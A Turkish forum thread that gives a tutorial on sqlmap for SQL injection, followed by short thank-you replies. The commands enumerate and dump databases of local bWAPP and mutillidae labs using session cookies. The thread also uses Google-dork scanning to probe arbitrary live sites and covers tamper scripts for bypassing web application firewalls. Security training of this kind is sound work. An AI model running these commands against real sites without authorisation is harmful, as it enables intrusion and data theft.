IRCRehberi.Net- Türkiyenin En iyi IRC ve Genel Forum Sitesi

IRCRehberi.Net- Türkiyenin En iyi IRC ve Genel Forum Sitesi (https://www.ircrehberi.net/)
-   Tablet ve Bilgisayarlar (https://www.ircrehberi.net/tablet-ve-bilgisayarlar/)
-   -   Linux SqlMap Kullanımı. (https://www.ircrehberi.net/tablet-ve-bilgisayarlar/69961-linux-sqlmap-kullanimi.html)

KuzenKit 18 Mayıs 2021 10:04

Linux SqlMap Kullanımı.
 
[Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...]

Sqlmap sql injection açıkları için geliştirilmiş çok ileri seviye bir araçtır. Python diliyle yazılmıştır. Sqlmap başlı başına ayrı bir kitap konusu bu yüzden biz genel olarak basit bir şekilde kullanımını ve bir kaç modülünü göreceğiz. Sqlmap, sqlmap [parametreler] şeklinde kullanılır. Bilgi ve yardım için -h parametresini kullanabilirsiniz. İleri düzey parametreler için - hh komutu ile öğrenebilir ve bilgi alabilirsiniz.

Komut:

Kod:

sqlmap -hh
[Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...]

Temel olarak tüm bağlantılarda kullanacağımız temel komut aşağıdaki gibidir.

Komut:

Kod:

sqlmap -u “hedefsite.com/index.php?id=” --dbs
İlk adımda bir dork tarayıp daha sonra localde kurduğumuz bir script üzerinden sql inj. saldırısı gerçekleştirelim. Dork taraması için -g parametresini kullanmamız gerekmektedir.

Dork:

Alıntı:

inurl:news.php?id=
Komut:

Kod:

sqlmap -u "inurl:news.php?id="
[Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...]

Burada verdiğimiz dork ile tek tek siteleri çekip ve çekilen sitede sql açığı olup olmadığını bizlere soruyor. Eğer hedef bağlantıda sql inj. açığı mevcut değil ise bir sonraki siteye geçer ve her site için kontrol edilip edilmeyeceğini bize sorar.

Hedef Site:

Alıntı:

[Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...]
Hedef site local’de çalıştırdığım bWAPP scriptidir. Bwapp scripti hakkında detaylı bilgi lab uygulamalarında verilmiştir.

Sql injection olan ilk soruyu açtığımızda bir arama formu çıkıp “’” meta karakteri ile hatayı aldık.


[Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...]

şekilde görüldüğü gibi hatamızı aldık. Bunu sqlmap vasıtasıyla verileri çekelim. Sql inj. ile verileri çekmeden önce kurduğumuz sistem kullanıcı girişi yapıldıktan sonra sql inj. tespit edilmiştir. Bundan yola çıkarak sqlmap direk sisteme erişim sağlayamacağı için sqlmap’e cookieleri girmemiz gerekmektedir. Cookieleri çekmek için herhangi bir cookie editör kullanabilirsiniz.

[Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...]

Cookie:

Alıntı:

cpd3s47416v7j9pd55od17vrf1
Security Level:

Alıntı:

0
Bunları sqlmap’te tanımlamak için –cookie parametresi kullanacağız.

Komut:

Kod:

sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' --dbs
[Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...]

Veritabanını çektik sıra tablolarda –tables parametreleri ile çekilir.

Komut:

Kod:

sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP --tables
[Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...]

bWAPP adlı veritabanındaki tabloları çekmiş olduk. Kolonları çekmek için –columns parametresi kullanılır.

Komut:

Kod:

sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP -T blog --columns
Sonuç:

Alıntı:

Database: bWAPP

Table: blog
[4 columns]
+--------+--------------+
| Column | Type
|
+--------+--------------+
| date | datetime
|
| entry | varchar(500) |
| id
| int(10)
|
| owner | varchar(100) |
+--------+--------------+
Kolonlardaki verileri çekmek için –dump parametresi kullanılır.

Komut:

Kod:

sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP -T blog -C id,date --dump
Örnek olarak burada id,date veri çekilme işlemi yapıldı içi boş değerler olduğu için sonuç vermedi. Bu işlemlerin tamamını çıktı olarak /root/.sqlmap/output/analiziyapılan şeklinde olarak txt formatında çıktımızı vermektedir.

Dosya Yolu:

Alıntı:

/root/.sqlmap/output/target
Sqlmap Waf Bypass Scriptleri

Hedef sistemde sql injectin varsa bile ve hedef sistemde waf olması durumlarda Waf Bypass scriptleri kullanılmaktadır. Bu scriptlere genel olarak tamper denilmektedir. Tamper scriptleri SqlMap’ın kurulu olduğu dizin altındaki tamper klasöründe bulunmaktadır.

Komut:

Kod:

cd /usr/share/sqlmap/tamper
ls

[Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...]

Tamper scriptleri python ile yazılmış olup tüm scriptlerin neler yapabileceğini öğrenmek isterseniz biraz programlama dili biliyorsanız scriptleride anlıyabilirsiniz. –tamper parametresi ile kullanılmaktadır. Bir örnek ile gösterecek olursak;

Örnek:

Kod:

sqlmap -u http://localhost/lab/mutillidae/index.php?page=user-info.php&username=%27&password=bug&user-info-php-submit-button=View+Account+Details --dbs --tamper=space2comment


Kaynak: Kali Linux Sayfa 142

Sim 18 Mayıs 2021 10:07

okuyup okuyup hicbir sey anlamiyorum resmen bu islerle ilgilenenlere helal olsun :gulmektencatlayan: paylasim icin tesekkürler emegine saglik

Publisher 18 Mayıs 2021 10:14

Emeğine sağlık @[Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...]

Reyhan 18 Mayıs 2021 11:10

Emeğinize sağlık

She 18 Mayıs 2021 11:11

Emeğine sağlık teşekkür ederiz konu için.


Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 00:26.

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2025, vBulletin Solutions, Inc.

Copyright ©2019 - 2025 | IRCRehberi.Net